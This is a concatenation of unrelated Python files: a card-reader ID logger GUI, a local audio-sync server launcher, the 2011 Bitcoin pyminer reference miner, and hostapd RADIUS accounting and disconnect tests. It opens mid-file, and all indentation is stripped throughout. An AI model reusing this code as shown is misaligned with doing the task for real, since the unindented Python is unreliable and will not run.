except ConfigException:
time.sleep(5)
|
gui.py
|
#!/usr/bin/env python3
import tkinter
import threading
import os
from sit_idcardlib_py import Reader
FILE_NAME = "ids.txt"
class App(tkinter.Frame):
def __init__(self, master=None):
super().__init__(master)
self.master = master
self.pack()
self.create_widgets()
def create_widgets(self):
self.id_label = tkinter.Label(
self,
text="Not detected",
padx=5,
pady=10,
font=("", 36)
)
self.id_label.pack(side=tkinter.TOP)
root = tkinter.Tk()
app = App(master=root)
def callback(card):
global app
global reader
try:
app.id_label["text"] = card.id
found = False
if os.path.isfile(FILE_NAME):
with open(FILE_NAME) as f:
while True:
student_id = f.readline()
if not student_id:
break
student_id = student_id.strip()
if student_id == card.id:
found = True
break
if not found:
with open(FILE_NAME, "a") as f:
f.write("{}\n".format(card.id))
except Exception as e:
print(e)
reader = Reader(callback)
def thread():
global reader
while True:
try:
reader.read()
except Exception as e:
print(e)
threading.Thread(target=thread).start()
app.mainloop()
|
main.py
|
import argparse
import sys
import signal
import time
import os
import subprocess
from multiprocessing import Process, Pool
from multiprocessing.managers import BaseManager
from itertools import product
from termcolor import colored
from server_comm import ServerConnection, set_vars
from vlc_comm import player
from util import get_videos, path2title, Animation
from audio_extract import extract
TO_CLEAR = ["cache", "invite_link.txt", "invite_link.svg"]
def parse():
parser = argparse.ArgumentParser(
description="Route audio of a video file through a local server."
)
group = parser.add_mutually_exclusive_group()
parser.add_argument(
"-f",
"--file",
required=True,
dest="f",
help="Path to video files or directory containing video files",
type=str,
action="append",
)
parser.add_argument(
"-s", "--sub", dest="sub", help="Load subtitle File", type=str, action="store"
)
parser.add_argument(
"--qr", help="Show qr code with the link", dest="qr", action="store_true"
)
parser.add_argument(
"--control",
help="only host can control play/pause signals",
dest="onlyHost",
action="store_true",
)
parser.add_argument(
"--force-rebuild",
help="Force rebuild of the local server",
dest="rebuild",
action="store_true",
)
parser.add_argument(
"--audio-quality",
dest="q",
help="Audio quality to sync from",
choices=["low", "medium", "good", "high"],
type=str,
default="medium",
)
group.add_argument(
"--web",
help="Force routing through a web server",
dest="web",
action="store_true",
)
args = parser.parse_args()
videos = []
for i in range(len(args.f)):
args.f[i] = os.path.abspath(args.f[i])
videos.extend(get_videos(args.f[i], TO_CLEAR))
args.f = videos
return args
def convert_async(paths):
""" Converts video files to audio files asynchronously
using a pool of processes """
pool = Pool()
files = []
st = time.perf_counter()
print(f"[{colored('+','green')}] Extraction of audio started ...")
p = pool.starmap_async(extract, product(paths, [args.q]), callback=files.extend)
p.wait()
print(
f"[{colored('+','green')}] Completed extraction of {colored(len(paths),'yellow')} file(s) in {colored(time.perf_counter()-st,'yellow')} seconds"
)
return files
def exitHandler(*args, **kwargs):
os.system("killall node 2> /dev/null")
os.system("killall npm 2> /dev/null")
for file in TO_CLEAR:
if os.path.exists(file):
try:
os.remove(file)
except:
pass
sys.exit(0)
def spawn_server():
SERVER_PATH = "../../CommonAudioVideoServer/"
if not os.path.exists(SERVER_PATH):
print(
f"[{colored('-','red')}] Invalid Server Path, Try {colored(reinstalling,'red')} the package"
)
sys.exit(-1)
if not os.path.exists(SERVER_PATH + "node_modules"):
print(f"[{colored('+','green')}] Configuring the server ..")
anim = Animation()
subprocess.Popen(
"npm install".split(),
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
cwd=os.getcwd() + "/" + SERVER_PATH,
).wait()
anim.complete()
print(f"[{colored('+','green')}] Server configuration complete ..")
if args.rebuild:
print(f"[{colored('+','green')}] Building server ..")
anim = Animation()
subprocess.Popen(
"npm run compile".split(),
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
cwd=os.getcwd() + "/" + SERVER_PATH,
).wait()
anim.complete()
print(f"[{colored('+','green')}] Server build successfull ..")
print(f"[{colored('+','green')}] Initializing Server ..")
anim = Animation()
proc = subprocess.Popen(
"npm start".split(),
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
cwd=os.getcwd() + "/" + SERVER_PATH,
)
for line in iter(proc.stdout.readline, ""):
if b"npm ERR!" in line:
print(colored(line, "red"))
print(
f"[{colored('-','red')}] An error has occured while starting the server\nRestarting the server"
)
os.system("killall node")
os.system("killall npm")
sys.exit(-1)
if b"Press CTRL-C to stop" in line:
anim.complete()
break
def initialize(videos, server, first=False):
audio = convert_async(videos)
for video in videos:
if args.web:
server.upload(video, video[:-3] + "ogg")
else:
server.addAudioPath(video, video[:-3] + "ogg")
player.enqueue(video)
if(first):
server.create_room()
player.play()
player.pause()
player.seek(0)
server.add_track(video)
if __name__ == "__main__":
signal.signal(signal.SIGINT, exitHandler)
args = parse()
set_vars(args)
if not args.web:
spawn_server()
player.launch(args.sub)
BaseManager.register("ServerConnection", ServerConnection)
manager = BaseManager()
manager.start()
server = manager.ServerConnection()
server.start_listening()
Process(target=player.update, args=(server,)).start()
initialize([args.f[0]], server=server, first=True)
if len(args.f) > 1:
Process(
target=initialize,
kwargs={"videos": args.f[1:], "server": server, "first": False},
).run()
print("\n" + colored("#" * 70, "green") + "\n")
while True:
time.sleep(1)
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 4221
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
test_radius.py
|
# RADIUS tests
# Copyright (c) 2013-2016, Jouni Malinen <j@w1.fi>
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
from remotehost import remote_compatible
import binascii
import hashlib
import hmac
import logging
logger = logging.getLogger()
import os
import select
import struct
import subprocess
import threading
import time
import hostapd
from utils import HwsimSkip, require_under_vm, skip_with_fips, fail_test
from test_ap_hs20 import build_dhcp_ack
from test_ap_ft import ft_params1
def connect(dev, ssid, wait_connect=True):
dev.connect(ssid, key_mgmt="WPA-EAP", scan_freq="2412",
eap="PSK", identity="psk.user@example.com",
password_hex="0123456789abcdef0123456789abcdef",
wait_connect=wait_connect)
@remote_compatible
def test_radius_auth_unreachable(dev, apdev):
"""RADIUS Authentication server unreachable"""
params = hostapd.wpa2_eap_params(ssid="radius-auth")
params['auth_server_port'] = "18139"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-auth", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"])
if ev is None:
raise Exception("Timeout on EAP start")
logger.info("Checking for RADIUS retries")
time.sleep(4)
mib = hapd.get_mib()
if "radiusAuthClientAccessRequests" not in mib:
raise Exception("Missing MIB fields")
if int(mib["radiusAuthClientAccessRetransmissions"]) < 1:
raise Exception("Missing RADIUS Authentication retransmission")
if int(mib["radiusAuthClientPendingRequests"]) < 1:
raise Exception("Missing pending RADIUS Authentication request")
def test_radius_auth_unreachable2(dev, apdev):
"""RADIUS Authentication server unreachable (2)"""
subprocess.call(['ip', 'ro', 'replace', '192.168.213.17', 'dev', 'lo'])
params = hostapd.wpa2_eap_params(ssid="radius-auth")
params['auth_server_addr'] = "192.168.213.17"
params['auth_server_port'] = "18139"
hapd = hostapd.add_ap(apdev[0], params)
subprocess.call(['ip', 'ro', 'del', '192.168.213.17', 'dev', 'lo'])
connect(dev[0], "radius-auth", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"])
if ev is None:
raise Exception("Timeout on EAP start")
logger.info("Checking for RADIUS retries")
time.sleep(4)
mib = hapd.get_mib()
if "radiusAuthClientAccessRequests" not in mib:
raise Exception("Missing MIB fields")
if int(mib["radiusAuthClientAccessRetransmissions"]) < 1:
raise Exception("Missing RADIUS Authentication retransmission")
def test_radius_auth_unreachable3(dev, apdev):
"""RADIUS Authentication server initially unreachable, but then available"""
subprocess.call(['ip', 'ro', 'replace', 'blackhole', '192.168.213.18'])
params = hostapd.wpa2_eap_params(ssid="radius-auth")
params['auth_server_addr'] = "192.168.213.18"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-auth", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"])
if ev is None:
raise Exception("Timeout on EAP start")
subprocess.call(['ip', 'ro', 'del', 'blackhole', '192.168.213.18'])
time.sleep(0.1)
dev[0].request("DISCONNECT")
hapd.set('auth_server_addr_replace', '127.0.0.1')
dev[0].request("RECONNECT")
dev[0].wait_connected()
def test_radius_acct_unreachable(dev, apdev):
"""RADIUS Accounting server unreachable"""
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-acct")
logger.info("Checking for RADIUS retries")
time.sleep(4)
mib = hapd.get_mib()
if "radiusAccClientRetransmissions" not in mib:
raise Exception("Missing MIB fields")
if int(mib["radiusAccClientRetransmissions"]) < 2:
raise Exception("Missing RADIUS Accounting retransmissions")
if int(mib["radiusAccClientPendingRequests"]) < 2:
raise Exception("Missing pending RADIUS Accounting requests")
def test_radius_acct_unreachable2(dev, apdev):
"""RADIUS Accounting server unreachable(2)"""
subprocess.call(['ip', 'ro', 'replace', '192.168.213.17', 'dev', 'lo'])
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "192.168.213.17"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
subprocess.call(['ip', 'ro', 'del', '192.168.213.17', 'dev', 'lo'])
connect(dev[0], "radius-acct")
logger.info("Checking for RADIUS retries")
time.sleep(4)
mib = hapd.get_mib()
if "radiusAccClientRetransmissions" not in mib:
raise Exception("Missing MIB fields")
if int(mib["radiusAccClientRetransmissions"]) < 1 and int(mib["radiusAccClientPendingRequests"]) < 1:
raise Exception("Missing pending or retransmitted RADIUS Accounting requests")
def test_radius_acct_unreachable3(dev, apdev):
"""RADIUS Accounting server initially unreachable, but then available"""
require_under_vm()
subprocess.call(['ip', 'ro', 'replace', 'blackhole', '192.168.213.18'])
as_hapd = hostapd.Hostapd("as")
as_mib_start = as_hapd.get_mib(param="radius_server")
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "192.168.213.18"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-acct")
subprocess.call(['ip', 'ro', 'del', 'blackhole', '192.168.213.18'])
time.sleep(0.1)
dev[0].request("DISCONNECT")
hapd.set('acct_server_addr_replace', '127.0.0.1')
dev[0].request("RECONNECT")
dev[0].wait_connected()
time.sleep(1)
as_mib_end = as_hapd.get_mib(param="radius_server")
req_s = int(as_mib_start['radiusAccServTotalResponses'])
req_e = int(as_mib_end['radiusAccServTotalResponses'])
if req_e <= req_s:
raise Exception("Unexpected RADIUS server acct MIB value")
def test_radius_acct_unreachable4(dev, apdev):
"""RADIUS Accounting server unreachable and multiple STAs"""
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
for i in range(20):
connect(dev[0], "radius-acct")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
def test_radius_acct(dev, apdev):
"""RADIUS Accounting"""
as_hapd = hostapd.Hostapd("as")
as_mib_start = as_hapd.get_mib(param="radius_server")
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
params['radius_auth_req_attr'] = [ "126:s:Operator", "77:s:testing",
"62:d:1" ]
params['radius_acct_req_attr'] = [ "126:s:Operator", "62:d:1",
"77:s:testing" ]
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-acct")
dev[1].connect("radius-acct", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="test-class",
password_hex="0123456789abcdef0123456789abcdef")
dev[2].connect("radius-acct", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk-cui",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
logger.info("Checking for RADIUS counters")
count = 0
while True:
mib = hapd.get_mib()
if int(mib['radiusAccClientResponses']) >= 3:
break
time.sleep(0.1)
count += 1
if count > 10:
raise Exception("Did not receive Accounting-Response packets")
if int(mib['radiusAccClientRetransmissions']) > 0:
raise Exception("Unexpected Accounting-Request retransmission")
as_mib_end = as_hapd.get_mib(param="radius_server")
req_s = int(as_mib_start['radiusAccServTotalRequests'])
req_e = int(as_mib_end['radiusAccServTotalRequests'])
if req_e < req_s + 2:
raise Exception("Unexpected RADIUS server acct MIB value")
acc_s = int(as_mib_start['radiusAuthServAccessAccepts'])
acc_e = int(as_mib_end['radiusAuthServAccessAccepts'])
if acc_e < acc_s + 1:
raise Exception("Unexpected RADIUS server auth MIB value")
def test_radius_acct_non_ascii_ssid(dev, apdev):
"""RADIUS Accounting and non-ASCII SSID"""
params = hostapd.wpa2_eap_params()
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
ssid2 = "740665007374"
params['ssid2'] = ssid2
hostapd.add_ap(apdev[0], params)
dev[0].connect(ssid2=ssid2, key_mgmt="WPA-EAP", scan_freq="2412",
eap="PSK", identity="psk.user@example.com",
password_hex="0123456789abcdef0123456789abcdef")
def test_radius_acct_pmksa_caching(dev, apdev):
"""RADIUS Accounting with PMKSA caching"""
as_hapd = hostapd.Hostapd("as")
as_mib_start = as_hapd.get_mib(param="radius_server")
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-acct")
dev[1].connect("radius-acct", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="test-class",
password_hex="0123456789abcdef0123456789abcdef")
for d in [ dev[0], dev[1] ]:
d.request("REASSOCIATE")
d.wait_connected(timeout=15, error="Reassociation timed out")
count = 0
while True:
mib = hapd.get_mib()
if int(mib['radiusAccClientResponses']) >= 4:
break
time.sleep(0.1)
count += 1
if count > 10:
raise Exception("Did not receive Accounting-Response packets")
if int(mib['radiusAccClientRetransmissions']) > 0:
raise Exception("Unexpected Accounting-Request retransmission")
as_mib_end = as_hapd.get_mib(param="radius_server")
req_s = int(as_mib_start['radiusAccServTotalRequests'])
req_e = int(as_mib_end['radiusAccServTotalRequests'])
if req_e < req_s + 2:
raise Exception("Unexpected RADIUS server acct MIB value")
acc_s = int(as_mib_start['radiusAuthServAccessAccepts'])
acc_e = int(as_mib_end['radiusAuthServAccessAccepts'])
if acc_e < acc_s + 1:
raise Exception("Unexpected RADIUS server auth MIB value")
def test_radius_acct_interim(dev, apdev):
"""RADIUS Accounting interim update"""
as_hapd = hostapd.Hostapd("as")
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
params['radius_acct_interim_interval'] = "1"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-acct")
logger.info("Checking for RADIUS counters")
as_mib_start = as_hapd.get_mib(param="radius_server")
time.sleep(3.1)
as_mib_end = as_hapd.get_mib(param="radius_server")
req_s = int(as_mib_start['radiusAccServTotalRequests'])
req_e = int(as_mib_end['radiusAccServTotalRequests'])
if req_e < req_s + 3:
raise Exception("Unexpected RADIUS server acct MIB value")
def test_radius_acct_interim_unreachable(dev, apdev):
"""RADIUS Accounting interim update with unreachable server"""
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
params['radius_acct_interim_interval'] = "1"
hapd = hostapd.add_ap(apdev[0], params)
start = hapd.get_mib()
connect(dev[0], "radius-acct")
logger.info("Waiting for interium accounting updates")
time.sleep(3.1)
end = hapd.get_mib()
req_s = int(start['radiusAccClientTimeouts'])
req_e = int(end['radiusAccClientTimeouts'])
if req_e < req_s + 2:
raise Exception("Unexpected RADIUS server acct MIB value")
def test_radius_acct_interim_unreachable2(dev, apdev):
"""RADIUS Accounting interim update with unreachable server (retry)"""
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
# Use long enough interim update interval to allow RADIUS retransmission
# case (3 seconds) to trigger first.
params['radius_acct_interim_interval'] = "4"
hapd = hostapd.add_ap(apdev[0], params)
start = hapd.get_mib()
connect(dev[0], "radius-acct")
logger.info("Waiting for interium accounting updates")
time.sleep(7.5)
end = hapd.get_mib()
req_s = int(start['radiusAccClientTimeouts'])
req_e = int(end['radiusAccClientTimeouts'])
if req_e < req_s + 2:
raise Exception("Unexpected RADIUS server acct MIB value")
def test_radius_acct_ipaddr(dev, apdev):
"""RADIUS Accounting and Framed-IP-Address"""
try:
_test_radius_acct_ipaddr(dev, apdev)
finally:
subprocess.call(['ip', 'link', 'set', 'dev', 'ap-br0', 'down'],
stderr=open('/dev/null', 'w'))
subprocess.call(['brctl', 'delbr', 'ap-br0'],
stderr=open('/dev/null', 'w'))
def _test_radius_acct_ipaddr(dev, apdev):
params = { "ssid": "radius-acct-open",
'acct_server_addr': "127.0.0.1",
'acct_server_port': "1813",
'acct_server_shared_secret': "radius",
'proxy_arp': '1',
'ap_isolate': '1',
'bridge': 'ap-br0' }
hapd = hostapd.add_ap(apdev[0], params, no_enable=True)
try:
hapd.enable()
except:
# For now, do not report failures due to missing kernel support
raise HwsimSkip("Could not start hostapd - assume proxyarp not supported in kernel version")
bssid = apdev[0]['bssid']
subprocess.call(['brctl', 'setfd', 'ap-br0', '0'])
subprocess.call(['ip', 'link', 'set', 'dev', 'ap-br0', 'up'])
dev[0].connect("radius-acct-open", key_mgmt="NONE", scan_freq="2412")
addr0 = dev[0].own_addr()
pkt = build_dhcp_ack(dst_ll="ff:ff:ff:ff:ff:ff", src_ll=bssid,
ip_src="192.168.1.1", ip_dst="255.255.255.255",
yiaddr="192.168.1.123", chaddr=addr0)
if "OK" not in hapd.request("DATA_TEST_FRAME ifname=ap-br0 " + binascii.hexlify(pkt)):
raise Exception("DATA_TEST_FRAME failed")
dev[0].request("DISCONNECT")
dev[0].wait_disconnected()
hapd.disable()
def send_and_check_reply(srv, req, code, error_cause=0):
reply = srv.SendPacket(req)
logger.debug("RADIUS response from hostapd")
for i in reply.keys():
logger.debug("%s: %s" % (i, reply[i]))
if reply.code != code:
raise Exception("Unexpected response code")
if error_cause:
if 'Error-Cause' not in reply:
raise Exception("Missing Error-Cause")
if reply['Error-Cause'][0] != error_cause:
raise Exception("Unexpected Error-Cause: {}".format(reply['Error-Cause']))
def test_radius_acct_psk(dev, apdev):
"""RADIUS Accounting - PSK"""
as_hapd = hostapd.Hostapd("as")
params = hostapd.wpa2_params(ssid="radius-acct", passphrase="12345678")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("radius-acct", psk="12345678", scan_freq="2412")
def test_radius_acct_psk_sha256(dev, apdev):
"""RADIUS Accounting - PSK SHA256"""
as_hapd = hostapd.Hostapd("as")
params = hostapd.wpa2_params(ssid="radius-acct", passphrase="12345678")
params["wpa_key_mgmt"] = "WPA-PSK-SHA256"
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("radius-acct", key_mgmt="WPA-PSK-SHA256",
psk="12345678", scan_freq="2412")
def test_radius_acct_ft_psk(dev, apdev):
"""RADIUS Accounting - FT-PSK"""
as_hapd = hostapd.Hostapd("as")
params = ft_params1(ssid="radius-acct", passphrase="12345678")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("radius-acct", key_mgmt="FT-PSK",
psk="12345678", scan_freq="2412")
def test_radius_acct_ieee8021x(dev, apdev):
"""RADIUS Accounting - IEEE 802.1X"""
skip_with_fips(dev[0])
as_hapd = hostapd.Hostapd("as")
params = hostapd.radius_params()
params["ssid"] = "radius-acct-1x"
params["ieee8021x"] = "1"
params["wep_key_len_broadcast"] = "13"
params["wep_key_len_unicast"] = "13"
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("radius-acct-1x", key_mgmt="IEEE8021X", eap="PSK",
identity="psk.user@example.com",
password_hex="0123456789abcdef0123456789abcdef",
scan_freq="2412")
def test_radius_das_disconnect(dev, apdev):
"""RADIUS Dynamic Authorization Extensions - Disconnect"""
try:
import pyrad.client
import pyrad.packet
import pyrad.dictionary
import radius_das
except ImportError:
raise HwsimSkip("No pyrad modules available")
params = hostapd.wpa2_eap_params(ssid="radius-das")
params['radius_das_port'] = "3799"
params['radius_das_client'] = "127.0.0.1 secret"
params['radius_das_require_event_timestamp'] = "1"
params['own_ip_addr'] = "127.0.0.1"
params['nas_identifier'] = "nas.example.com"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-das")
addr = dev[0].p2p_interface_addr()
sta = hapd.get_sta(addr)
id = sta['dot1xAuthSessionId']
dict = pyrad.dictionary.Dictionary("dictionary.radius")
srv = pyrad.client.Client(server="127.0.0.1", acctport=3799,
secret="secret", dict=dict)
srv.retries = 1
srv.timeout = 1
logger.info("Disconnect-Request with incorrect secret")
req = radius_das.DisconnectPacket(dict=dict, secret="incorrect",
User_Name="foo",
NAS_Identifier="localhost",
Event_Timestamp=int(time.time()))
logger.debug(req)
try:
reply = srv.SendPacket(req)
raise Exception("Unexpected response to Disconnect-Request")
except pyrad.client.Timeout:
logger.info("Disconnect-Request with incorrect secret properly ignored")
logger.info("Disconnect-Request without Event-Timestamp")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
User_Name="psk.user@example.com")
logger.debug(req)
try:
reply = srv.SendPacket(req)
raise Exception("Unexpected response to Disconnect-Request")
except pyrad.client.Timeout:
logger.info("Disconnect-Request without Event-Timestamp properly ignored")
logger.info("Disconnect-Request with non-matching Event-Timestamp")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
User_Name="psk.user@example.com",
Event_Timestamp=123456789)
logger.debug(req)
try:
reply = srv.SendPacket(req)
raise Exception("Unexpected response to Disconnect-Request")
except pyrad.client.Timeout:
logger.info("Disconnect-Request with non-matching Event-Timestamp properly ignored")
logger.info("Disconnect-Request with unsupported attribute")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
User_Name="foo",
User_Password="foo",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 401)
logger.info("Disconnect-Request with invalid Calling-Station-Id")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
User_Name="foo",
Calling_Station_Id="foo",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 407)
logger.info("Disconnect-Request with mismatching User-Name")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
User_Name="foo",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
logger.info("Disconnect-Request with mismatching Calling-Station-Id")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
Calling_Station_Id="12:34:56:78:90:aa",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
logger.info("Disconnect-Request with mismatching Acct-Session-Id")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
Acct_Session_Id="12345678-87654321",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
logger.info("Disconnect-Request with mismatching Acct-Session-Id (len)")
req = radius_das.DisconnectPacket(dict=dict, secret="secret",
Acct_Session_Id="12345678",
Event_Timestamp=int(time.time()))
send_and_check_reply(srv, req, pyrad.packet.DisconnectNAK, 503)
